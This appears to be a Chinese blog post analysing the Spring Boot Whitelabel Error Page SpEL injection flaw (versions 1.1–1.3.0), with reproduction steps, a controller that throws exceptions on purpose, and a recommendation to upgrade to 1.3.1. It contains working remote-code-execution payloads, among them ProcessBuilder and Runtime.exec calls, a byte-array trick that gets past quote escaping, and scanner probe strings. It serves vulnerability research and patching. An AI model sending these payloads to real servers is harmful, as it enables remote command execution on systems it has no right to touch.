Spring Boot框架Whitelabel Error Page SpEL注入漏洞分析

最新推荐文章于 2025-10-08 19:05:45 发布
原创 最新推荐文章于 2025-10-08 19:05:45 发布 · 9.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文深入分析了Spring Boot的Whitelabel Error Page存在的SpEL注入漏洞,解释了漏洞产生的原因,展示了漏洞复现过程,并提供了修复方案。攻击者可以利用此漏洞执行任意系统命令。建议受影响的企业尽快升级到1.3.1及以上版本。
部署运行你感兴趣的模型镜像

微信公众号:DebugPwn



新浪微博:http://weibo.com/u/2275304001?refer_flag=1005055010_


SpEL Introduction

The Spring Expression Language (SpEL for short) is a powerful expression language that supports querying and manipulating an object graph at runtime. The language syntax is similar to Unified EL but offers additional features, most notably method invocation and basic string templating functionality.

SpEL表达式带来方便的同时也带来了安全风险,攻击者可以注入恶意的SpEL表达式以获取系统的权限。



Spring Boot 框架Whitelabel Error Page SpEL注入的原因就是系统报错页面把用户的输入当做了表达式来执行,详情:

https://github.com/spring-projects/spring-boot/issues/4763


补丁地址:https://github.com/spring-projects/spring-boot/commit/edb16a13ee33e62b046730a47843cb5dc92054e6

漏洞复现:

下载spring-boot-1.3.0.RELEASE找到spring-boot-sample

spring-boot-1.3.0.RELEASE\spring-boot-1.3.0.RELEASE\spring-boot-samples\spring-boot-sample-tomcat-jsp,修改WelcomeController代码如下,这样就能导致程序异常。

@RequestMapping("/fail2")
public String fail2(String payload) {
   System.out.print(payload);
   Integer.parseInt(payload);
   throw new IllegalStateException();
}

或者

@RequestMapping("/fail2")
public String fail2(String payload) {
   throw new IllegalStateException(payload);
}

一些测试用例的原因导致demo不能构建成功,需要maven配置:

<plugin>
   <groupId>org.apache.maven.plugins</groupId>
   <artifactId>maven-surefire-plugin</artifactId>
   <version>2.6</version>
   <configuration>
      <skipTests>true</skipTests>
   </configuration>
</plugin>


通过调试可得到Whitelabel Error Page模板页:

<html><body><h1>Whitelabel Error Page</h1><p>This application has no explicit mapping for /error, so you are seeing this as a fallback.

</p><div id='created'>${timestamp}</div><div>There was an unexpected error (type=${error}, status=${status}).</div><div>${message}</div></body></html>

当程序在运行的时候会解析其中的SpEL的表达式来填充value值得内容。

单步调试,可以看到对应异常的根对象信息:



继续跟进可以看到执行了expression.getValue(this.content)方法:


最后可以看到我们的pyaload成功执行了:



调用计算器:

http://localhost:8080/fail2?payload=${(new%20java.lang.ProcessBuilder(%27calc%27)).start()}

在解析SpEL表达式的时候注入表达式变成了&quot;aaa&quot;.replace(&#39;a&#39;,&#39;b&#39;)

可以看到payload中带有' " 的一些特殊字符会被html实体转义,导致不能预期的执行代码。

@Override
protected SpelExpression doParseExpression(String expressionString, ParserContext context) throws ParseException {
   try {
      this.expressionString = expressionString;
      Tokenizer tokenizer = new Tokenizer(expressionString);
      tokenizer.process();
      this.tokenStream = tokenizer.getTokens();
      this.tokenStreamLength = this.tokenStream.size();
      this.tokenStreamPointer = 0;
      this.constructedNodes.clear();
      SpelNodeImpl ast = eatExpression();
      if (moreTokens()) {
         throw new SpelParseException(peekToken().startPos, SpelMessage.MORE_INPUT, toString(nextToken()));
      }
      Assert.isTrue(this.constructedNodes.isEmpty());
      return new SpelExpression(expressionString, ast, this.configuration);
   }
   catch (InternalParseException ex) {
      throw ex.getCause();
   }
}


但是可以通过String类动态生成特殊字符,最终构造:

http://localhost:8080/fail2?payload=${new%20java.lang.ProcessBuilder(new%20java.lang.String(new%20byte[]{99,97,108,99})).start()}


之前看到几个朋友的扫描器payload是下面这样的,然后说扫不出来东西,因为针对Spring Boot这个漏洞压根就不会触发,只能检测到异常。

payload=${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27netstat%20-na%27).getInputStream())}

payload=${pageContext.request.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22calc%22,null,null).toString()}

payload=${(new%20java.lang.ProcessBuilder(%27calc%27)).start()}

payload=${getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc",null).toString()}

payload=${new%20java.lang.String(new%20byte[]{86,117,108,110,101,114,97,98,108,101}).toUpperCase()}


最佳扫描器payload

payload=${new%20java.lang.String(new%20byte[]{86,117,108,110,101,114,97,98,108,101})}。

payload=${(java.lang.Math).random() * 100.0}

前提需要目标系统控制器抛出异常才能触发这个漏洞。


修复方案:

目前分析该漏洞影响Spring Boot版本为1.1-1.3.0,建议企业进行排查,如果使用了该缺陷版本建议立即升级至1.3.1及以上版本。


参考:

Spring Boot框架SPEL漏洞技术分析与防护方案

http://blog.nsfocus.net/spel-vulnerability-technical-analysis-and-protection-scheme/

Spring Expression Language (SpEL)

http://docs.spring.io/spring/docs/current/spring-framework-reference/html/expressions.html

spring boot应用启动原理分析 

http://blog.youkuaiyun.com/hengyunabc/article/details/50120001

使用 Spring Boot 快速构建 Spring 框架应用

http://www.ibm.com/developerworks/cn/java/j-lo-spring-boot/

漏洞预警 | Spring Boot 框架存在高危通用漏洞

http://mp.weixin.qq.com/s?__biz=MzIyMjExNzk5NQ==&mid=2653079419&idx=1&sn=63c00b9dbc37c29072edb9b87b940758&scene=4#wechat_redirect

http://blog.nsfocus.net/spel-vulnerability-technical-analysis-and-protection-scheme/


您可能感兴趣的与本文相关的镜像

Facefusion

Facefusion

AI应用

FaceFusion是全新一代AI换脸工具,无需安装,一键运行,可以完成去遮挡,高清化,卡通脸一键替换,并且Nvidia/AMD等显卡全平台支持

whitelabel error page SpEL RCE漏洞复现
为之的博客
11-18 1798
漏洞成因 正常情况下访问/article并输入数字型id即可获取文章内容,但如果传入了spel表达式,则会导致转到错误页面同时对spel表达式内容进行解析并反应在错误页面中。 debug过程 同样从DispatcherServlet.doDispatch()函数开始,很快就定位到了关键类:即PropertyPlaceholderHelper类。 在DispatcherServlet中由于以下判定报错 protected void doDispatch(HttpServletRequest request,
[WooYun-2016-226888] SpringBoot框架SpEL漏洞复现与原理详细分析
Specif1c的博客
08-16 1882
这是2016年爆出的一个洞,在 CVE 上没有找到对应编号,经过多方资料查阅最终确认是唐朝实验室在乌云上提交的该通用漏洞,缺陷编号为WooYun-2016-226888。漏洞的产生主要来自程序员没有做异常处理 (开发要养成好习惯:fist:),使用了 springboot 默认的报错页面 (Whitelabel Error Page),默认报错页面会把判断参数是否是 SpEL 表达式,如果是就进行解析,进而导致一些危险操作的发生。由于继 2016年后依旧频频出现相关框架出现 SpEL 表达式注入漏洞,具有学
(2022年12月最新)SpringBoot远程代码执行whitelabel error page SpEL RCE漏洞复现
qq1140037586的博客
12-20 3747
spring boot 处理参数值出错,流程进入org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。其中 ${} 包围的内容都会被org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行,造成 RCE 漏洞
浅析SpringBoot框架常见未授权访问漏洞
最新发布
lza20001103的博客
10-08 1120
浅析SpringBoot框架常见未授权访问漏洞
Spring-boot远程代码执行Whitelabel Error Page spel rce复现
YouthBelief的博客
11-22 3217
所有文章,仅供安全研究与学习之用,后果自负! Spring-boot远程代码执行Spring-boot远程代码执行Whitelabel Error Page spel rce复现0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Spring-boot远程代码执行Whitelabel Error Page spel rce复现 0x01 漏洞描述 spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholde
Springboot Whitelabel Error Page
W_A_Hao的博客
12-30 1490
要将Application类放在最外侧,即包含所有子包spring-boot会自动加载启动类所在包下及其子包下的所有组件,下面举例说明。**正确位置:在组件的同包或者组件的外层包内都可以,总之启动类的位置范围应大于或者等于组件所在位置.上面这句话大概的意思“这个应用没有明确的映射/错误,所以你才会看到这样一个返回结果”。在这总结确认了目前的三种错误案例。
Whitelabel Error Page
zhaomissnan的博客
04-05 205
Whitelabel Error Page
spring boot框架漏洞复现
nemey的博客
11-26 1424
spring - java开源框架有五种版本1: 直接就在根下 /版本2:根下的必须目录 /actuator/端口:9093spring boot搭建1:直接下载源码打包2:运行编译好的jar包:actuator-testbed-0.1.0.jarjdk版本是1.8。
『JavaWeb漏洞复现』低版本Springboot报错页面SPEL注入
Ho1aAs‘s Blog
06-10 1882
向一个可以能引发报错的controller传参,报错时会渲染出报错页面对输入的参数SPEL解析Springboot: 1.1.0 ~ 1.1.12、1.2.0 ~ 1.2.7、1.3.0新建Springboot项目,设置为受影响的版本编写一个通过输入能抛出错误的controller 传入SPEL表达式触发注入这里SPEL表达式是不能含有单双引号的,否则无法RCE,因此在exec的时候需要绕过:将引号字符串换成ascii表示 ascii转换: 代码审计 从报错页面渲染开始,在org.springframewo
Whitelabel Error Page漏洞
08-17
Whitelabel Error Page漏洞是指在使用Spring Boot框架开发的应用程序中,当传入的参数中包含SpEL表达式时,会导致应用程序转到错误页面并对SpEL表达式进行解析并反映在错误页面中。这个漏洞的存在可能会导致信息泄露...
精选资源
Spring Boot 相关漏洞学习资源
11-05
对每个漏洞类型的阐述细致入微,例如在远程代码执行部分,针对多种可能导致 RCE 的情况,如 whitelabel error page SpEL RCE、spring cloud SnakeYAML RCE 等,分别进行了深入讲解,包括各自独特的利用条件、步骤...
Spring Boot : Whitelabel Error Page
路西法Lucifer
09-06 1463
ps:若项目正常启动,controller代码没有问题,控制台无报错,端口号正确,浏览器输入url,仍然是404,解决方案如下: 项目结构: springboot启动类: package com.lucifer.controller; import org.springframework.boot.SpringApplication; import org.springframewo...
Spring报错Whitelabel Error Page
time_cool的博客
09-09 150
IDEA目录结构的问题,Application启动类的位置不对.要将Application类放在最外侧,即包含所有子包。而我的controller则放在了最外层的包里面。把启动类要覆盖所有的子包。
Spring-boot远程代码执行系列(whitelabel error page SpEL RCE)
网络安全。
06-16 4419
0x01 漏洞原理 spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。 其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解
Spring boot 提示“Whitelabel Error Page
惊鸿的博客
03-21 4622
spring出现下图的错误: 首先有以下可能: 1、端口错误 由于我近期学习了 自定义环境,可以随意切换开发的环境,我们记得地址框输入的时候,要改成自己的端口号 2、GetMapping 书写错误 此处也要和地址栏一一对应 3、controller 和我们的启动类不在同包下 这个问题我弄了好久,这背时的同一目录下,童鞋们!必须在同一目录!下,如: ...
spring boot Whitelabel Error Page
nick_king的博客
12-27 301
Whitelabel Error Page 出现这个情况可能会有很多原因,我的原因是在配置文件上,我在配置文件中是这么写的: 在controller中也写了个hello,具体的如下图所示: 但是我启动过后访问localhost:8080/hello,始终都是Whitelabel Error Page这个错误,经过多次排查以及自己的猜测,找到了解决办法,访问localhost:8080/hel...
Spring Boot报错Whitelabel Error Page
理想的不够纯粹,现实的不够彻底。
11-28 997
Whitelabel Error PageThis application has no explicit mapping for /error, so you are seeing this as a fallback. Tue Nov 28 08:48:21 CST 2017 There was an unexpected error (type=Not Found, status=404)
Spring Boot项目出现问题: Whitelabel Error Page
Artisan_w
06-07 819
Spring Boot项目出现问题: Whitelabel Error Page This application has no explicit mapping for /error, so you are seeing this as a fallback. Tue Jun 07 11:39:11 CST 2022
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值